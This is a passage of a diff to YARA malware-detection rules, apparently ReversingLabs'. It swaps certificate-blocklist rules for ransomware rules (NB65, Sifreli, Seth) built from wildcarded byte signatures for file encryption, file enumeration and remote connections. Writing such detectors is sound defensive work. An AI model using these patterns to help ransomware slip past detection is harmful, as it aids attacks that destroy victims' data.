?? ?? 85 C0 0F 84 ?? ?? ?? ?? 57 8D 45 ?? 50 8D 45 ?? 50 56 6A ?? 56 FF + 75 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? FF 75 ?? 8D 45 ?? 50 FF 75 ?? 56 56 + 56 FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 56 6A ?? 53 56 FF 15 ?? ?? ?? + ?? FF 75 ?? 68 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 8D 04 43 50 FF 15 ?? ?? ?? ?? 83 C4 + ?? 57 53 FF 15 ?? ?? ?? ?? 56 6A ?? 6A ?? 56 56 68 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? + 89 45 ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 56 8D 4D ?? 51 FF 75 ?? FF 75 ?? 50 FF 15 ?? ?? + ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 45 ?? 3B 45 ?? 0F 85 ?? ?? ?? ?? 56 8D 45 ?? 50 57 + 8D 45 ?? 50 FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 39 7D ?? 75 ?? FF 75 ?? C7 45 ?? + ?? ?? ?? ?? FF 15 ?? ?? ?? ?? FF 75 ?? 53 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? + ?? 6A ?? FF 15 ?? ?? ?? ?? 8B F8 3B FE 74 ?? 56 6A ?? 57 56 FF 15 ?? ?? ?? ?? 85 C0 + 74 ?? FF 75 ?? 68 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 8D 04 47 50 FF 15 ?? ?? ?? ?? 83 + C4 ?? 56 57 53 FF 15 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? EB ?? FF 75 ?? FF 15 ?? ?? ?? + ?? FF 75 ?? FF 15 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? + 5F 8B 45 ?? 8B 08 50 FF 51 ?? 53 FF 15 ?? ?? ?? ?? 8B 45 ?? 5E 5B 83 C5 ?? C9 C2 + } + $enumerate_resources = { + 55 8B EC 83 EC ?? 8D 45 ?? 50 FF 75 ?? 6A ?? 6A ?? 6A ?? E8 ?? ?? ?? ?? 85 C0 0F 85 + ?? ?? ?? ?? 53 8B 1D ?? ?? ?? ?? 56 57 BE ?? ?? ?? ?? 56 6A ?? FF D3 8B F8 89 7D ?? + 85 FF [2-8] 83 4D ?? ?? 8D 45 ?? 50 57 8D 45 ?? 50 FF 75 ?? 89 75 ?? E8 + ?? ?? ?? ?? 85 C0 75 ?? 39 45 ?? 74 ?? 8D 77 ?? F6 46 ?? ?? 74 ?? 8D 46 ?? 50 [0-3] + E8 ?? ?? ?? ?? EB ?? 83 7E ?? ?? 75 ?? FF 36 FF 15 ?? ?? ?? ?? 8D 44 00 ?? 50 6A + ?? FF D3 8B F8 85 FF 74 ?? FF 36 57 FF 15 ?? ?? ?? ?? [0-5] 57 E8 ?? ?? ?? + ?? 57 FF 15 ?? ?? ?? ?? 83 C6 ?? FF 4D ?? 75 ?? 8B 7D ?? 57 FF 15 ?? ?? ?? ?? FF 75 + ?? E8 ?? ?? ?? ?? 5F 5E 5B C9 C2 + } -rule REVERSINGLABS_Cert_Blocklist_067Dffc5E3026Eb4C62971C98Ac8A900 : INFO FILE + condition: + uint16(0)==0x5A4D and (($create_key_file and $create_lst_file and $enumerate_resources and $encrypt_files) or ($create_key and $enumerate_resources and $encrypt_files)) +} +rule REVERSINGLABS_Win32_Ransomware_NB65 : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Yara rule that detects NB65 ransomware." author = "ReversingLabs" - id = "9b9771bb-c2a4-5a6e-8fdb-b3e98f62f9b1" - date = "2023-11-08" - modified = "2023-11-08" + id = "1aba009e-8065-5fb0-98e7-a595cb324076" + date = "2022-06-01" + modified = "2022-06-01" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L3044-L3060" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "2b7c4cded14afd8ba3feabb6debaa1317917b811b44e22aa8a0b3ea00d689141" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Win32.Ransomware.NB65.yara#L1-L68" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "f8a0e265fc72a9f017b37ce4b6dbb878285a5d298ab1b8c69f9fde7159426981" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "NB65" + tc_detection_factor = 5 importance = 25 + strings: + $encrypt_files = { + E8 ?? ?? ?? ?? 89 45 ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? + C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? + C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? + C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? + C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? 8A 45 ?? 80 7D ?? ?? 75 ?? 33 C9 90 8A 44 0D ?? + 0F B6 C0 83 E8 ?? 6B C0 ?? 99 F7 FB 8D 42 ?? 99 F7 FB 88 54 0D ?? 41 83 F9 ?? 72 ?? + 8D 45 ?? 89 45 ?? A1 ?? ?? ?? ?? 8B 80 ?? ?? ?? ?? 85 C0 75 ?? 68 ?? ?? ?? ?? 8D 50 + ?? 33 C9 E8 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 89 81 ?? ?? ?? ?? 68 ?? ?? ?? ?? 57 FF D0 + 85 C0 75 ?? 33 F6 66 90 A1 ?? ?? ?? ?? 8B 80 ?? ?? ?? ?? 85 C0 75 ?? 68 ?? ?? ?? ?? + 8D 50 ?? 33 C9 E8 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 89 81 ?? ?? ?? ?? FF B4 B5 ?? ?? ?? + ?? 57 FF D0 85 C0 75 ?? 46 83 FE ?? 7C ?? 5F 5E B8 ?? ?? ?? ?? 5B 8B E5 5D C3 + } + $find_files = { + 57 57 57 50 57 53 FF 15 ?? ?? ?? ?? 8B F0 8B 85 ?? ?? ?? ?? 83 FE ?? 75 ?? 50 57 57 + 53 E8 ?? ?? ?? ?? 83 C4 ?? 8B F8 83 FE ?? 74 ?? 56 FF 15 ?? ?? ?? ?? 8B C7 8B 4D ?? + 5F 5E 33 CD 5B E8 ?? ?? ?? ?? 8B E5 5D C3 8B 48 ?? 2B 08 C1 F9 ?? 89 8D ?? ?? ?? ?? + 80 BD ?? ?? ?? ?? ?? 75 ?? 8A 8D ?? ?? ?? ?? 84 C9 74 ?? 80 F9 ?? 75 ?? 80 BD ?? ?? + ?? ?? ?? 74 ?? 50 FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 53 50 E8 ?? ?? ?? ?? 83 C4 ?? + 85 C0 75 ?? 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? 85 C0 8B 85 ?? ?? ?? ?? 75 ?? + 8B 10 8B 40 ?? 8B 8D ?? ?? ?? ?? 2B C2 C1 F8 ?? 3B C8 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? + ?? 2B C1 6A ?? 50 8D 04 8A 50 E8 ?? ?? ?? ?? 83 C4 ?? E9 + } + $enum_procs = { + 33 C9 66 90 8A 84 0D ?? ?? ?? ?? 0F B6 C0 83 E8 ?? 8D 04 C0 99 F7 BD ?? ?? ?? ?? 8D + 42 ?? 99 F7 BD ?? ?? ?? ?? 88 94 0D ?? ?? ?? ?? 41 83 F9 ?? 72 ?? A1 ?? ?? ?? ?? 8B + 40 ?? 85 C0 75 ?? 68 ?? ?? ?? ?? 33 D2 33 C9 E8 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 89 41 + ?? 8D 8D ?? ?? ?? ?? 51 8D 8D ?? ?? ?? ?? 51 FF D0 85 C0 75 ?? 6A ?? E8 ?? ?? ?? ?? + 83 C4 ?? 85 C0 74 ?? C7 00 ?? ?? ?? ?? 8D 50 ?? 8B 8D ?? ?? ?? ?? 89 08 C7 02 ?? ?? + ?? ?? 8B 4E ?? 89 48 ?? 8B 4E ?? 89 01 89 56 ?? 8D 85 ?? ?? ?? ?? 50 57 FF D3 85 C0 + 0F 85 ?? ?? ?? ?? 5B A1 ?? ?? ?? ?? 8B 40 ?? 85 C0 75 ?? 68 ?? ?? ?? ?? 33 D2 33 C9 + E8 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 89 41 ?? 57 FF D0 8B 4D ?? 5F 33 CD 5E E8 ?? ?? ?? + ?? 8B E5 5D C3 + } + condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "DVERI FADO, TOV" and pe.signatures[i].serial=="06:7d:ff:c5:e3:02:6e:b4:c6:29:71:c9:8a:c8:a9:00" and 1552176000<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and ($find_files) and ($enum_procs) and ($encrypt_files) } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_B1Da219688E51Fd0Bfac2C891D56Cbb8 : INFO FILE +rule REVERSINGLABS_Win32_Ransomware_Sifreli : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Yara rule that detects Sifreli ransomware." author = "ReversingLabs" - id = "245c582a-b168-53ce-9a3c-b291ae5bc2a0" - date = "2023-11-08" - modified = "2023-11-08" + id = "974f81e2-6907-54da-97e3-3116c41b5ed4" + date = "2020-10-08" + modified = "2020-10-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L3062-L3080" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "03549214940a8689213bd2eb891da1c1991627c81c8b7f26860141c397409d46" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Win32.Ransomware.Sifreli.yara#L1-L119" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "48f6cc678bea81afece0ae203fb27b61e2c6e4f7188a3bd260190f568c9a8a06" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "Sifreli" + tc_detection_factor = 5 importance = 25 + strings: + $find_files = { + 55 8B EC 83 EC ?? 53 56 57 8B 7D ?? 8B C7 8D 50 ?? 66 8B 08 83 C0 ?? 66 85 C9 75 ?? + 2B C2 D1 F8 8D 44 00 ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 50 A1 ?? ?? ?? ?? + 6A ?? 50 FF D6 8B D8 89 5D ?? 85 DB 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 57 53 FF 15 ?? + ?? ?? ?? 8B 0D ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 51 FF D6 8B F8 85 FF 0F 84 ?? ?? ?? + ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? E8 ?? ?? ?? ?? 3D ?? ?? + ?? ?? 1B C0 40 A3 ?? ?? ?? ?? EB ?? A1 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 57 50 53 FF 15 + ?? ?? ?? ?? 89 45 ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 90 F6 07 ?? 74 + ?? BB ?? ?? ?? ?? B9 ?? ?? ?? ?? 8D 47 ?? 66 8B 10 66 3B 11 75 ?? 66 85 D2 74 ?? 66 + 8B 50 ?? 66 3B 51 ?? 75 ?? 83 C0 ?? 83 C1 ?? 66 85 D2 75 ?? 33 C0 EB ?? 33 DB EB ?? + 1B C0 83 D8 ?? 85 C0 74 ?? B9 ?? ?? ?? ?? 8D 47 ?? 8D 49 ?? 66 8B 10 66 3B 11 75 ?? + 66 85 D2 74 ?? 66 8B 50 ?? 66 3B 51 ?? 75 ?? 83 C0 ?? 83 C1 ?? 66 85 D2 75 ?? 33 C0 + EB ?? 1B C0 83 D8 ?? 85 C0 74 ?? 8B 55 ?? 8B 4D ?? 52 8D 47 ?? 50 8B 07 50 53 68 ?? + ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 ?? 8B 55 ?? 57 52 FF 15 ?? ?? ?? ?? 85 + C0 0F 85 ?? ?? ?? ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 8B 5D ?? EB ?? C7 45 ?? ?? ?? ?? + ?? 8B 0D ?? ?? ?? ?? 57 6A ?? 51 FF 15 ?? ?? ?? ?? EB ?? C7 45 ?? ?? ?? ?? ?? 8B 15 + ?? ?? ?? ?? 53 6A ?? 52 FF 15 ?? ?? ?? ?? 8B 45 ?? 5F 5E 5B 8B E5 5D C3 5F 5E B8 ?? + ?? ?? ?? 5B 8B E5 5D C3 + } + $remote_connection_p1 = { + 55 8B EC 83 EC ?? 53 33 DB 8D 45 ?? 89 5D ?? E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? + 8B 45 ?? 8B 4D ?? 56 57 50 51 E8 ?? ?? ?? ?? 8B F8 83 C4 ?? 85 FF 74 ?? 8B 55 ?? 8B + 4D ?? 52 57 E8 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 8B F0 83 C4 ?? 85 F6 74 ?? 8B 45 ?? 6A + ?? 50 6A ?? 6A ?? 56 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8B D6 E8 ?? ?? ?? ?? 85 C0 74 ?? + C7 45 ?? ?? ?? ?? ?? 56 FF D3 8D 4D ?? 51 8D 55 ?? 52 6A ?? 57 C7 45 ?? ?? ?? ?? ?? + C7 45 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 57 8B F0 FF D3 85 F6 74 ?? 8B 45 ?? 50 FF D3 + 8B 5D ?? 83 7D ?? ?? 8B 35 ?? ?? ?? ?? 74 ?? 8B 4D ?? 8B 15 ?? ?? ?? ?? 51 6A ?? 52 + FF D6 8B 45 ?? 85 C0 74 ?? 50 A1 ?? ?? ?? ?? 6A ?? 50 FF D6 5F 5E 8B C3 5B 8B E5 5D + C3 8B C3 5B 8B E5 5D C3 + } + $remote_connection_p2 = { + 55 8B EC 83 EC ?? 56 57 68 ?? ?? ?? ?? 33 FF 57 57 57 57 FF 15 ?? ?? ?? ?? 8B F0 85 + F6 74 ?? 8B 3D ?? ?? ?? ?? B8 ?? ?? ?? ?? 6A ?? 89 45 ?? 89 45 ?? 8D 45 ?? 50 6A ?? + 56 C7 45 ?? ?? ?? ?? ?? FF D7 6A ?? 8D 4D ?? 51 6A ?? 56 FF D7 6A ?? 8D 55 ?? 52 6A + ?? 56 FF D7 8B 45 ?? 8B 4D ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 50 51 56 FF 15 ?? ?? ?? + ?? 8B F8 85 FF 75 ?? 56 FF 15 ?? ?? ?? ?? 8B C7 5F 5E 8B E5 5D C3 + } + $remote_connection_p3 = { + 55 8B EC 83 EC ?? 53 56 8B F0 33 C0 89 06 57 89 46 ?? 89 46 ?? 6A ?? 50 89 46 ?? 8D + 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 4D ?? 51 6A ?? BF ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? + ?? C7 45 ?? ?? ?? ?? ?? 89 7D ?? 89 7D ?? 89 7D ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? + ?? ?? ?? 8B 4D ?? 8B 1D ?? ?? ?? ?? 8D 4C 09 ?? 33 C0 85 C9 74 ?? 8B 15 ?? ?? ?? ?? + 51 50 52 FF D3 89 06 85 C0 0F 84 ?? ?? ?? ?? 8B 4D ?? 8B 55 ?? 51 52 50 E8 ?? ?? ?? + ?? 8B 06 8B 55 ?? 33 C9 66 89 0C 50 8B 4D ?? 83 C4 ?? 85 C9 74 ?? 8B 45 ?? 66 83 38 + ?? 75 ?? 83 45 ?? ?? 2B CF 89 4D ?? 85 C9 75 ?? 8B 55 ?? 8D 7C 0A ?? 8D 54 3F ?? 33 + C0 85 D2 74 ?? 52 50 A1 ?? ?? ?? ?? 50 FF D3 8B 4D ?? 89 46 ?? 85 C0 74 ?? 51 8B 4D + ?? 51 83 C0 ?? 50 E8 ?? ?? ?? ?? 8B 55 ?? 8B 45 ?? 8B 4E ?? 52 8B 55 ?? 50 8D 44 51 + ?? 50 E8 ?? ?? ?? ?? 8B 46 ?? B9 ?? ?? ?? ?? 66 89 08 33 D2 66 89 14 78 66 8B 45 ?? + 83 C4 ?? 83 7D ?? ?? 66 89 46 ?? 75 ?? 83 4E ?? ?? 5F 5E B8 ?? ?? ?? ?? 5B 8B E5 5D + C3 8B 36 85 F6 74 ?? 8B 0D ?? ?? ?? ?? 56 6A ?? 51 FF 15 ?? ?? ?? ?? 5F 5E 33 C0 5B + 8B E5 5D C3 + } + $encrypt_files_1 = { + 8B C3 8D 50 ?? 66 8B 08 83 C0 ?? 66 85 C9 75 ?? 2B C2 D1 F8 57 8B F8 8D 4C 3F ?? 33 + C0 85 C9 74 ?? 51 50 A1 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 56 8B F0 8B CB + 2B F3 8D 9B ?? ?? ?? ?? 0F B7 11 66 89 14 0E 83 C1 ?? 66 85 D2 75 ?? B9 ?? ?? ?? ?? + 8D 34 3F 2B F1 03 F0 EB ?? 8D 49 ?? 0F B7 11 66 89 14 0E 83 C1 ?? 66 85 D2 75 ?? 5E + 5F C3 + } + $encrypt_files_2 = { + 83 E8 ?? 53 56 57 8B DA 74 ?? 48 74 ?? 5F 5E 33 C0 5B C3 53 51 33 F6 E8 ?? ?? ?? ?? + 83 C4 ?? 85 C0 74 ?? E8 ?? ?? ?? ?? 8B F0 33 FF 85 F6 74 ?? 56 53 FF 15 ?? ?? ?? ?? + 85 C0 74 ?? BF ?? ?? ?? ?? A1 ?? ?? ?? ?? 56 6A ?? 50 FF 15 ?? ?? ?? ?? 8B F7 5F 8B + C6 5E 5B C3 53 51 33 F6 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 ?? E8 ?? ?? ?? ?? 8B F0 33 + FF 85 F6 74 ?? 56 53 FF 15 ?? ?? ?? ?? 85 C0 74 ?? BF ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? + 56 6A ?? 51 FF 15 ?? ?? ?? ?? 8B F7 5F 8B C6 5E 5B C3 ?? ?? 55 8B EC 8B 4D ?? 8B 41 + ?? 83 F8 ?? 0F 8F ?? ?? ?? ?? F7 45 ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 40 53 89 41 ?? + 8B 45 ?? 83 E8 ?? 56 57 74 ?? 48 0F 85 ?? ?? ?? ?? 8B 7D ?? 33 F6 8D 9B ?? ?? ?? ?? + 8B 86 ?? ?? ?? ?? 50 57 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 ?? ?? ?? ?? 83 C6 ?? 83 + FE ?? 72 ?? 8B 5D ?? E8 ?? ?? ?? ?? 8B F0 85 F6 74 ?? 8B 4D ?? 51 56 E8 ?? ?? ?? ?? + 83 C4 ?? EB ?? 8B 41 ?? 83 E8 ?? 74 ?? 48 75 ?? 8B 75 ?? E8 ?? ?? ?? ?? EB ?? 8B 75 + ?? 8B C6 E8 ?? ?? ?? ?? F7 D8 1B C0 F7 D8 85 C0 74 ?? 8B 5D ?? 8B FE E8 ?? ?? ?? ?? + 8B F0 85 F6 74 ?? 8B 7D ?? 8B 47 ?? 8B 0F 8B D6 E8 ?? ?? ?? ?? 85 C0 74 ?? 8B 47 ?? + 85 C0 74 ?? 50 FF 15 ?? ?? ?? ?? 8B C6 E8 ?? ?? ?? ?? 8B 45 ?? FF 48 ?? 5F 5E 5B B8 + ?? ?? ?? ?? 5D C3 + } + $encrypt_files_3 = { + 8B C6 8D 50 ?? 66 8B 08 83 C0 ?? 66 85 C9 75 ?? 2B C2 D1 F8 83 C0 ?? 85 C0 7E ?? EB + ?? 8D 49 ?? 66 83 3C 46 ?? 74 ?? 48 85 C0 7F ?? 33 C0 C3 8D 44 46 ?? 85 C0 74 ?? 83 + C0 ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? B8 ?? ?? ?? ?? C3 + } + condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "FIRNEEZ EUROPE LIMITED" and (pe.signatures[i].serial=="00:b1:da:21:96:88:e5:1f:d0:bf:ac:2c:89:1d:56:cb:b8" or pe.signatures[i].serial=="b1:da:21:96:88:e5:1f:d0:bf:ac:2c:89:1d:56:cb:b8") and 1542931200<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and ($find_files) and ( all of ($encrypt_files_*)) and ( all of ($remote_connection_p*)) } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_7289B0F9Bd641E3E352Dc3183F8De6Be : INFO FILE +rule REVERSINGLABS_Win64_Ransomware_Seth : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Yara rule that detects Seth ransomware." author = "ReversingLabs" - id = "dc8a745f-7150-57b7-9ddc-e5a1721d8c02" - date = "2023-11-08" - modified = "2023-11-08" + id = "001de900-4556-5428-a243-7ec07a7ed05e" + date = "2021-04-02" + modified = "2021-04-02" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L3082-L3098" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "42b068e85b3aff5e6dd5ec4979f546dc5338ebf8719d86c0641ffb8353959af9" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Win64.Ransomware.Seth.yara#L1-L122" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "72a9d902eea2381f40d42faa7f1686c4ca54d364af0cbd8711697bbc1a235646" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "Seth" + tc_detection_factor = 5 importance = 25 + strings: + $encrypt_files_p1 = { + 55 53 48 81 EC ?? ?? ?? ?? 48 8D AC 24 ?? ?? ?? ?? 48 89 8D ?? ?? ?? ?? 48 8D 85 ?? + ?? ?? ?? 4C 8D 05 ?? ?? ?? ?? 48 8B 95 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? BA ?? ?? + ?? ?? 48 8B 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? + BA ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 + 89 C1 E8 ?? ?? ?? ?? BA ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 C1 48 8B 95 ?? + ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 41 89 C8 48 89 C1 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? + 48 05 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 84 C0 74 ?? 48 8D 15 ?? ?? ?? ?? 48 8B 0D + ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 C1 48 8B 85 ?? ?? ?? ?? 48 89 C2 E8 ?? ?? ?? ?? 48 + 8B 15 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? BA + ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 8D 95 ?? ?? ?? ?? 48 89 + C1 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 48 + 8D 15 ?? ?? ?? ?? 48 8B 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 C1 48 8B 85 + } + $encrypt_files_p2 = { + 48 89 C2 E8 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 89 C1 8B 85 + ?? ?? ?? ?? 89 C2 E8 ?? ?? ?? ?? 48 8B 15 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 8B 85 + ?? ?? ?? ?? 48 98 48 89 C1 E8 ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 48 + 63 C8 48 8B 95 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 49 89 C8 48 89 C1 E8 ?? ?? ?? ?? 48 + 8B 95 ?? ?? ?? ?? 48 8D 45 ?? 41 B8 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 8B 85 ?? ?? + ?? ?? 48 63 C8 48 8B 95 ?? ?? ?? ?? 48 8D 45 ?? 49 89 C8 48 89 C1 E8 ?? ?? ?? ?? 48 + 8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 83 + BD ?? ?? ?? ?? ?? 74 ?? 48 8B 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 45 ?? 48 + 89 C1 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? + ?? 48 89 C1 E8 ?? ?? ?? ?? EB ?? 48 89 C3 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? EB ?? + 48 89 C3 48 8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? EB ?? 48 89 C3 48 8D 85 ?? ?? + ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 89 D8 48 89 C1 E8 ?? ?? ?? ?? 90 48 81 C4 ?? ?? ?? + ?? 5B 5D C3 + } + $remote_connection_p1 = { + 55 48 81 EC ?? ?? ?? ?? 48 8D AC 24 ?? ?? ?? ?? 48 89 8D ?? ?? ?? ?? 48 8B 05 ?? ?? + ?? ?? FF D0 89 C1 E8 ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? BA ?? ?? ?? ?? 48 8D 85 ?? ?? + ?? ?? 41 89 D0 48 89 C2 48 8D 0D ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? FF D0 48 8B 05 ?? + ?? ?? ?? FF D0 89 C1 E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 C1 BA ?? ?? ?? ?? 89 C8 F7 EA + C1 FA ?? 89 C8 C1 F8 ?? 29 C2 89 D0 69 C0 ?? ?? ?? ?? 29 C1 89 C8 8D 88 ?? ?? ?? ?? + 48 8D 95 ?? ?? ?? ?? 48 8D 45 ?? 41 89 C9 49 89 D0 48 8D 15 ?? ?? ?? ?? 48 89 C1 48 + 8B 05 ?? ?? ?? ?? FF D0 C7 44 24 ?? ?? ?? ?? ?? 41 B9 ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? + BA ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? FF D0 48 89 85 ?? ?? ?? ?? + 48 83 BD ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 48 C7 44 24 ?? ?? ?? + ?? ?? C7 44 24 ?? ?? ?? ?? ?? 41 B9 ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? 48 8B 95 ?? ?? ?? + ?? 48 89 C1 48 8B 05 ?? ?? ?? ?? FF D0 48 89 85 ?? ?? ?? ?? 48 83 BD ?? ?? ?? ?? ?? + 0F 84 ?? ?? ?? ?? 48 8D 45 ?? 48 C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? 